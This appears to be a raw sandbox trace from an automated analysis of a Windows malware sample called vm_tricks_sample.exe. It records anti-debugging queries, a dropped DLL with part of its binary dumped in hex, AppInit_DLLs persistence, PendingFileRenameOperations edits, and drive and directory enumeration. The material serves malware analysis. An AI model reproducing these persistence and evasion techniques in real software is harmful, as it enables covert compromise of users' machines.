Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 00 00 success or wait 537513073
Directory Information Queried Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp Disposition: BothDirectoryInformation Filemask: <.exe no such file 537526794
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 
33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 00 00 success or wait 537547270
Directory Information Queried Path: C:\WINDOWS\Web Disposition: BothDirectoryInformation Filemask: <.exe no such file 537551463
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Name: PendingFileRenameOperations Type: unicode array Data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 57 00 45 00 42 00 5C 00 00 00 00 00 00 00 Old data: 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 4E 00 65 00 77 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 53 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 73 00 70 00 6F 00 6F 00 6C 00 5C 00 44 00 52 00 49 00 56 00 45 00 52 00 53 00 5C 00 57 00 33 00 32 00 58 00 38 00 36 00 5C 00 33 00 5C 00 6D 00 64 00 69 00 75 00 69 00 2E 00 64 00 6C 00 6C 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 6F 00 63 00 75 00 6D 00 65 00 6E 00 74 00 73 00 20 00 61 00 6E 00 64 00 20 00 53 00 65 00 74 00 74 00 69 00 6E 00 67 00 73 00 5C 00 41 00 64 00 6D 00 69 00 6E 00 69 00 73 00 74 00 72 00 61 00 74 00 6F 00 72 00 5C 00 41 00 70 00 70 00 6C 00 69 00 63 00 61 00 74 00 69 00 6F 00 6E 00 20 00 44 00 61 00 74 00 61 00 5C 00 00 00 00 00 5C 00 3F 00 3F 00 5C 00 43 00 3A 00 5C 00 44 00 4F 00 43 00 55 00 4D 00 45 00 7E 00 31 00 5C 00 41 00 44 00 4D 00 49 00 4E 00 49 00 7E 00 31 00 5C 00 4C 00 4F 00 43 00 41 00 4C 00 53 00 7E 00 31 00 5C 00 54 00 65 00 6D 00 70 00 5C 00 00 00 00 00 00 00 success or wait 537582511
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugPort success or wait 537584911
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugPort success or wait 537585887
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugObjectHandle port not set 537586189
Process information queried Path: C:\vm_tricks_sample.exe PID: 484 Info Class: DebugFlags success or wait 537588132
File created Path: C:\WINDOWS\mssys.dll Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: system Content Overwritten: true success or wait 537589911
File write Path: C:\WINDOWS\mssys.dll Offset: unknown Length: 67072 Value: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f6 40 00 c3 b2 21 6e 90 b2 21 6e 90 b2 21 6e 90 ac 73 ea 90 90 21 6e 90 ac 73 fb 90 a2 21 6e 90 ac 73 ed 90 df 21 6e 90 95 e7 15 90 b1 21 6e 90 b2 21 6f 90 d3 21 6e 90 ac 73 e7 90 b5 21 6e 90 ac 73 ff 90 b3 21 6e 90 52 69 63 68 b2 21 6e 90 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5d 34 88 4f 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 00 01 00 00 10 00 00 00 b0 05 success or wait 537647432
Key value replaced with new Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Name: AppInit_DLLs Type: unicode Data: C:\WINDOWS\mssys.dll Old data: success or wait 537650175
Thread created PID: 484 TID: 384 EIP: 7C8106F9 EAX: 414DC0 Imagepath: C:\vm_tricks_sample.exe success or wait 539559971
Thread created PID: 484 TID: 2032 EIP: 7C8106F9 EAX: 413ED0 Imagepath: C:\vm_tricks_sample.exe success or wait 539667007
Thread created PID: 484 TID: 728 EIP: 7C8106F9 EAX: 4153C0 Imagepath: C:\vm_tricks_sample.exe success or wait 539669851
Thread delayed Time: -120 TID: 728 user apc 539675392
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\Disposition: BothDirectoryInformation Filemask: * success or wait 539678105
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539682084
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\Disposition: BothDirectoryInformation Filemask: * success or wait 539695761
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539699467
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\export\Disposition: BothDirectoryInformation Filemask: unknown no more files 539700089
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\Disposition: BothDirectoryInformation Filemask: * success or wait 539725797
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539729496
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\Disposition: BothDirectoryInformation Filemask: * success or wait 539742043
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\Disposition: BothDirectoryInformation Filemask: unknown success or wait 539750685
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\dump\Disposition: BothDirectoryInformation Filemask: unknown no more files 539751020
Process created PID: 1764 Path: C:\vm_tricks_sample.exe Cmdline: C:\vm_tricks_sample.exe Createflags: none success or wait 539754468
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\syscalls\Disposition: BothDirectoryInformation Filemask: unknown no more files 539766669
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\Disposition: BothDirectoryInformation Filemask: * success or wait 540209397
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540212651
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\logs\Disposition: BothDirectoryInformation Filemask: unknown no more files 540213994
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\Disposition: BothDirectoryInformation Filemask: * success or wait 540233280
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540236711
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\udf\Disposition: BothDirectoryInformation Filemask: unknown no more files 540239479
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\Disposition: BothDirectoryInformation Filemask: * success or wait 540257037
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540275104
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\Disposition: BothDirectoryInformation Filemask: * success or wait 540283636
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540293827
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\shoots\Disposition: BothDirectoryInformation Filemask: unknown no more files 540294848
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\import\Disposition: BothDirectoryInformation Filemask: unknown no more files 540304344
Directory Information Queried Path: \;Z:0000000000008bf9\192.168.0.2\xpanalyzer1\Disposition: BothDirectoryInformation Filemask: unknown no more files 540308811
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540313649
File opened Path: y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540313883
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540328658
File opened Path: x: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540329950
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540331303
File opened Path: w: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540332165
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540332860
File opened Path: v: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540333492
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540333992
File opened Path: u: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540334260
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540334911
File opened Path: t: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540335137
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540335712
File opened Path: s: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540335909
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540336237
File opened Path: r: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540336659
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540336974
File opened Path: q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540337743
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540338324
File opened Path: p: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540338523
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540338856
File opened Path: o: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540339051
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540340339
File opened Path: n: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540341471
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540346306
File opened Path: m: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540346696
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540347934
File opened Path: l: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540348902
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540350203
File opened Path: k: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540350426
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540351330
File opened Path: j: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540351534
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540352488
File opened Path: i: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540352708
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540354301
File opened Path: h: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540355281
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540355935
File opened Path: g: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540356172
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540358050
File opened Path: f: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540358255
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540359585
File opened Path: e: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 540360086
Directory Information Queried Path: C:\Disposition: BothDirectoryInformation Filemask: * success or wait 540365935
Directory Information Queried Path: C:\Disposition: BothDirectoryInformation Filemask: unknown success or wait 540366148
Directory Information Queried Path: C:\Documents and SettingsDisposition: BothDirectoryInformation Filemask: * success or wait 540369168
Directory Information Queried Path: C:\Documents and SettingsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540374544
Directory Information Queried Path: C:\Documents and Settings\AdministratorDisposition: BothDirectoryInformation Filemask: * success or wait 540383587
Directory Information Queried Path: C:\Documents and Settings\AdministratorDisposition: BothDirectoryInformation Filemask: unknown success or wait 540383818
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: * success or wait 540387210
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application DataDisposition: BothDirectoryInformation Filemask: unknown success or wait 540390117
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: * success or wait 540392705
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\AdobeDisposition: BothDirectoryInformation Filemask: unknown success or wait 540392890
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: * success or wait 540397617
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: unknown success or wait 540397806
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: * success or wait 540401611
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: unknown success or wait 540419021
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: * success or wait 540429355
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: unknown success or wait 540445875
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\CollabDisposition: BothDirectoryInformation Filemask: unknown no more files 540446025
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: * success or wait 540449599
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540449787
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\FormsDisposition: BothDirectoryInformation Filemask: unknown no more files 540450132
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: * success or wait 540456291
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540456463
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScriptsDisposition: BothDirectoryInformation Filemask: unknown no more files 540456648
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0Disposition: BothDirectoryInformation Filemask: unknown no more files 540468640
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\AcrobatDisposition: BothDirectoryInformation Filemask: unknown no more files 540470568
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: * success or wait 540476408
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown success or wait 540476577
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: * success or wait 540482564
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: unknown success or wait 540482746
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: * success or wait 540493814
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: unknown success or wait 540494001
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCache\4LU5DXRWDisposition: BothDirectoryInformation Filemask: unknown no more files 540494970
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash Player\AssetCacheDisposition: BothDirectoryInformation Filemask: unknown no more files 540497209
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Flash PlayerDisposition: BothDirectoryInformation Filemask: unknown no more files 540499184
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: * success or wait 540506594
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\LinguisticsDisposition: BothDirectoryInformation Filemask: unknown success or wait 540506763
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: * success or wait 540515387
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\DictionariesDisposition: BothDirectoryInformation Filemask: unknown success or wait 540516128
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: * success or wait 540526373
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom DictionaryDisposition: BothDirectoryInformation Filemask: unknown success or wait 540526567
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: * success or wait 540530533
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: unknown success or wait 540532604
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\allDisposition: BothDirectoryInformation Filemask: unknown no more files 540532778
Memory allocated PID: 1764 Path: C:\vm_tricks_sample.exe Base: 400000 Length: 12FAB0 Allocation Type: unknown Protection: page read and write success or wait 540548889
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: * success or wait 540550761
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: unknown success or wait 540550956
Directory Information Queried Path: C:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\grmDisposition: BothDirectoryInformation Filemask: unknown no more files 540551115
